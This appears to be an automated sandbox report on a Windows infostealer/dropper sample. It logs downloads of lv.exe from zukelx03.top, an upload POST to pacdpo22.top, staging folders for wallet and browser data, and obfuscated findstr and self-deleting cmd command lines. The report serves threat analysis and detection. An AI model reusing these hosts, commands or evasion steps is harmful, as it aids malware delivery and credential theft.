                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,
                      Source: global trafficHTTP traffic detected: GET /1N5Jh7 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: iplogger.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: zukelx03.topConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ip-api.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: pacdpo22.topContent-Length: 73148Cache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0040B180 RegQueryValueExW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,CopyFileW,

                      System Summary:

                      barindex
                      Submitted sample is a known malware sampleShow sources
                      Source: C:\Windows\SysWOW64\cmd.exeDropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
                      PE file contains section with special charsShow sources
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_004140F0
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00414800
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0041BF2F
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00434000
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0041C194
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00412210
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0042E2EE
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00411650
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00430B0C
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00422BF0
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00420C29
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00430C2C
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0041BCFD
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00413D80
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00432FBD
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_03094340
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0309C3E4
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_030B320D
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0309C17F
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_0040737E
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406EFE
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004079A2
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004049A8
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E9871
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004EA81D
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004EA418
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E9551
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E9BE8
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E9FB0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess Stats: CPU usage > 98%
                      Source: lv[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lv[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lv[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: File.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: File.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: File.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: wheezy.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: wheezy.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7yyqdBJVGf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E1FEA ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: String function: 004062CF appears 58 times
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: String function: 00417470 appears 50 times
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: String function: 0040FAF0 appears 56 times
                      Source: lv[1].exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.00268554688
                      Source: File.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.00268554688
                      Source: parted.exe.10.drStatic PE information: Section: ZLIB complexity 0.998956853693
                      Source: parted.exe.10.drStatic PE information: Section: ZLIB complexity 0.989397321429
                      Source: IntelRapid.exe.15.drStatic PE information: Section: ZLIB complexity 0.998956853693
                      Source: IntelRapid.exe.15.drStatic PE information: Section: ZLIB complexity 0.989397321429
                      Source: 7yyqdBJVGf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile created: C:\Users\user\AppData\Roaming\aumagaJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@34/34@6/7
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E40C8 GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E54CE GetDlgItem,GetDlgItem,ShowWindow,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                      Source: C:\Users\user\AppData\Local\Temp\File.exeFile created: C:\Program Files (x86)\folerJump to behavior
                      Source: 7yyqdBJVGf.exeVirustotal: Detection: 52%
                      Source: 7yyqdBJVGf.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\7yyqdBJVGf.exe 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeProcess created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Quegli.wav
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe 'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe'
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
                      Source: C:\Users\user\AppData\Local\Temp\File.exeProcess created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeProcess created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Quegli.wav
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeProcess created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile created: C:\Users\user~1\AppData\Local\Temp\kCFlwhSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004024FB CoCreateInstance,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exeMutant created: \Sessions\1\BaseNamedObjects\{37529D08-A67E-40B3-B0F2-EB87331B47F5}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \_Files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \_Files\_Files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \_Files\_Wallet
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \_Files\_Chrome
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \_Files\_Opera
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \_Files\_Brave
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \files_
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \files_\files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \files_\_Chrome
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \files_\_Opera
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: \files_\_Brave
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCommand line argument: >6C
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 7yyqdBJVGf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wextract.pdb source: wheezy.exe, wheezy.exe.10.dr
                      Source: Binary string: wextract.pdb0lbp source: wheezy.exe, 0000000D.00000002.338763664.00000000004E1000.00000020.00020000.sdmp, wheezy.exe.10.dr
                      Source: Binary string: C:\sojeli.pdb source: 7yyqdBJVGf.exe
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: parted.exe, 0000000F.00000002.332649250.00007FF613923000.00000040.00020000.sdmp, IntelRapid.exe, 00000016.00000002.776682417.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001A.00000002.340848160.00007FF778293000.00000040.00020000.sdmp, IntelRapid.exe, 0000001D.00000002.367061379.00007FF778293000.00000040.00020000.sdmp
                      Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: IntelRapid.exe
                      Source: Binary string: acppage.pdb source: acppage.dll.10.dr
                      Source: 7yyqdBJVGf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 7yyqdBJVGf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 7yyqdBJVGf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 7yyqdBJVGf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 7yyqdBJVGf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeUnpacked PE file: 0.2.7yyqdBJVGf.exe.400000.0.unpack
                      Obfuscated command line foundShow sources
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_004174B6 push ecx; ret
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0043768D push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exeCode function: 13_2_004E7049 push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name:
                      Source: parted.exe.10.drStatic PE information: section name: .themida
                      Source: parted.exe.10.drStatic PE information: section name: .boot
                      Source: acppage.dll.10.drStatic PE information: section name: .orpc
                      Source: IntelRapid.exe.15.drStatic PE information: section name:
